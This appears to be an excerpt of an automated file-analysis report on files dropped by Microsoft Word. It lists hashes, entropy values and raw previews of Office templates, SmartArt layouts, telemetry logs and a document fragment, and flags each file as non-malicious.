                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6144
                                                                                      Entropy (8bit):3.0600656889270526
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:exlba+s+4y2mVuouT9FOVQ02MzEciDVvYR7tn63yliJcJypKMJW5751bbyv7m:ejbx2mUHML2ZVYt6iliJcJygMJW73GvC
                                                                                      MD5:7536016451C8A67ACB4E928EDAB52AF9
                                                                                      SHA1:AD16CD38DA42D9F77EA6AB1AC1CBF05510DCC32A
                                                                                      SHA-256:525657B0551C4594BCCF85ACFDFC31EEFFC5FDF1E63EE4F49856305C9A2546E5
                                                                                      SHA-512:97E6D26F6D28A5C2E7BDB25B2FBD8DB7BCD97E7F34E90714A5D04873C028A2B4096CA23F9B735A3E1FF70F889B44C02E981E696227D1748FFD4C15829E42E87F
                                                                                      Malicious:false
                                                                                      Preview:E.m.p.l.o.y.e.e. .A.l.l.o.c.a.t.i.o.n.0.1.d.e.7.f.d.c.2.2.4.3.7.d.3.b.2.d.1.f.8.9.2.7.2.2.7.f.5.d.6.0...............................................................................................................................................................................................................................................................................................................................................................................................................................&...D...F...D...F...J...........f...................*...B...........................V...X............{j{j.YjD.{..................(B*.OJ..QJ..^J..mH..nH..ph....sH..tH..u...!5..CJ..\..aJ..mH..nH..sH..tH..u..!5..CJ..\..aJ..mH..nH..sH..tH..u...CJ..aJ..mH..nH..sH..tH..u....j....U..mH..nH..sH..tH..u...+B*.OJ..QJ..]..^J..mH..nH..ph....sH..tH..u...B*.mH..nH..ph....sH..tH..u..."5..B*.\..mH..nH..ph....sH..tH..u.....j....U..mH..nH..sH..tH..u.....j....U..mH..nH..sH..tH..u....mH..nH..sH..t
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1536
                                                                                      Entropy (8bit):1.3120375248498821
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rld:mEMEEEul39lCgK1qVI4kNLLqJI
                                                                                      MD5:DA64EDBD11AE63A92D193A838A403E60
                                                                                      SHA1:F6B846852B5AB6651FE4E225627F3277424ECFF0
                                                                                      SHA-256:03D184280079A42AF08F773BFDADE443F412785356AD20A695415234EC339804
                                                                                      SHA-512:A02C455DA2059334121D41E46C99603136B8034FBCB7AF539B5891634699C2D1B3B23FDF95C94EA80E8C5E8C75FCD600A26D692C1FF84B2A3EAA655D29371CB6
                                                                                      Malicious:false
                                                                                      Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:ASCII text, with very long lines (1323), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):20971520
                                                                                      Entropy (8bit):0.01415280201380463
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:mpTQjRTyuUPjrY6Xk/C8khMz/BBdTE3x/YA:c1
                                                                                      MD5:7A90683B85D4241826B18E1FEB73C138
                                                                                      SHA1:3B8B3EC8E63DF785866715080F2E5A85F2E82A15
                                                                                      SHA-256:E1DC5F783498EF6927DC2D525ED99E15A880A9508C1037BC718E5E9BB65D2364
                                                                                      SHA-512:8708746A8F43355D29EA2186E989398AAA12A68827F2E9624D005B4D1AF38732BD943CD915050F8F6E250B265FCDE251D702A9AAE4F431C3E3457FF6BB3B6DA3
                                                                                      Malicious:false
                                                                                      Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/15/2024 17:08:37.314.WINWORD (0x1B1C).0x3D4.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-11-15T17:08:37.314Z","Contract":"Office.System.Activity","Activity.CV":"88/CHNWdK0OQSrFnBbBumg.7.1","Activity.Duration":232,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/15/2024 17:08:37.314.WINWORD (0x1B1C).0x3D4.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-11-15T17:08:37.314Z","Contract":"Office.System.Activity","Activity.CV":"88/CHNWdK0OQSrFnBbBumg.7","Activity.Duration":607,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):20971520
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                      SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                      SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                      SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):258
                                                                                      Entropy (8bit):3.4692172273306268
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                      MD5:C1B36A0547FB75445957A619201143AC
                                                                                      SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                      SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                      SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):7370
                                                                                      Entropy (8bit):7.9204386289679745
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                      MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                      SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                      SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                      SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                      Malicious:false
                                                                                      Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):252
                                                                                      Entropy (8bit):3.48087342759872
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                      MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                      SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                      SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                      SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):4326
                                                                                      Entropy (8bit):7.821066198539098
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                      MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                      SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                      SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                      SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                      Malicious:false
                                                                                      Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):262
                                                                                      Entropy (8bit):3.4901887319218092
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                      MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                      SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                      SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                      SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):5596
                                                                                      Entropy (8bit):7.875182123405584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                      MD5:CDC1493350011DB9892100E94D5592FE
                                                                                      SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                      SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                      SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                      Malicious:false
                                                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.5039994158393686
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                      MD5:16711B951E1130126E240A6E4CC2E382
                                                                                      SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                      SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                      SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3683
                                                                                      Entropy (8bit):7.772039166640107
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                      MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                      SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                      SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                      SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                      Malicious:false
                                                                                      Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):280
                                                                                      Entropy (8bit):3.484503080761839
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                      MD5:1309D172F10DD53911779C89A06BBF65
                                                                                      SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                      SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                      SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):9191
                                                                                      Entropy (8bit):7.93263830735235
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                      MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                      SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                      SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                      SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                      Malicious:false
                                                                                      Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):278
                                                                                      Entropy (8bit):3.5280239200222887
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                      MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                      SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                      SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                      SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):268317
                                                                                      Entropy (8bit):5.05419861997223
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                      MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                      SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                      SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
